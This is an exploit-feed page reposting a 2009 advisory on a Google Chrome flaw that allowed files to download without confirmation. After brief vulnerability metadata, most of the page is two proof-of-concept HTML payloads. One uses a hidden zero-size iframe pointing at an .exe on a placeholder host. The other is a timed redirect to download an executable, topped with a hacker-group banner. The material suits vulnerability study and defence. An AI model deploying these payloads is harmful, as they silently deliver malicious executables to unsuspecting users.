|
Feeds -
Exploits
|
|
Written by nerex
|
|
Monday, 30 March 2009 22:13 |
Google Chrome Arbitrary File Download Vulnerability
-\\Bugtraq ID:
31000
-\\Class:
Design Error
-\\CVE:
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Sep 03 2008 12:00AM
-\\Updated:
Mar 30 2009 08:26PM
-\\Credit:
nerex
-\\Vulnerable:
Google Chrome 0.2.149 27
-\\Discussion
Google Chrome is prone to a security vulnerability because the application allows users to download arbitrary files without confirmation.
This issue may allow attackers to perform social-engineering or other attacks to trick users into downloading a malicious file.
-\\Exploit(s)/PoC(s):
Attackers can use social engineering or other techniques to trick an unsuspecting user into downloading a malicious file.
UPDATE (March 30, 2009): This issue is being exploited in the wild.
The following examples are available:
===============================================================
31000.html
^^^^^^^^^^^
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>
===============================================================
31000-2.html
^^^^^^^^^^^^^
<html>
<head>
<title>Chrome Auto download Exploit .. By HACKERS PAL</title>
<script>
function soft_download()
{
window.setTimeout("location.href='http://localhost/1.exe'", 3000);
}
-->
</script>
</head>
<body style="background-color:#000000;" onload="show();">
<script>
<!--
soft_download();
exec('dir');
-->
</script>
<font color="red" size="4"><b>
########################################################<br>
# Google Chrome Auto download :)<br>
# <br>
# Discovered By : HACKERS PAL<br>
# Copy rights : HACKERS PAL<br>
# Website : <a href="http://www.soqor.net">WwW.SoQoR.NeT</a><br>
# Email Address : <a href="
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
">
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
</a><br>
#<br>
# Tested Successfully on Google Chrome Build 1798
<br>
########################################################
</b></font>
-\\Solution
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
-\\References(s)
--Google Chrome Homepage
http://www.google.com/chrom (Google)
--Google Chrome Auto download exploit ..
http://www.securityfocus.com/archive/1/49604 (
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
)
--Google Chrome Automatic File Download
http://www.securityfocus.com/archive/1/49594 (
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
)
--RE: Google Chrome Automatic File Download
http://www.securityfocus.com/archive/1/49595 (James C. Slora Jr. <
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
>)
--RES: Google Chrome Automatic File Download
http://www.securityfocus.com/archive/1/49595 (DIOGO LEAL CHAGAS <
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
>)
|
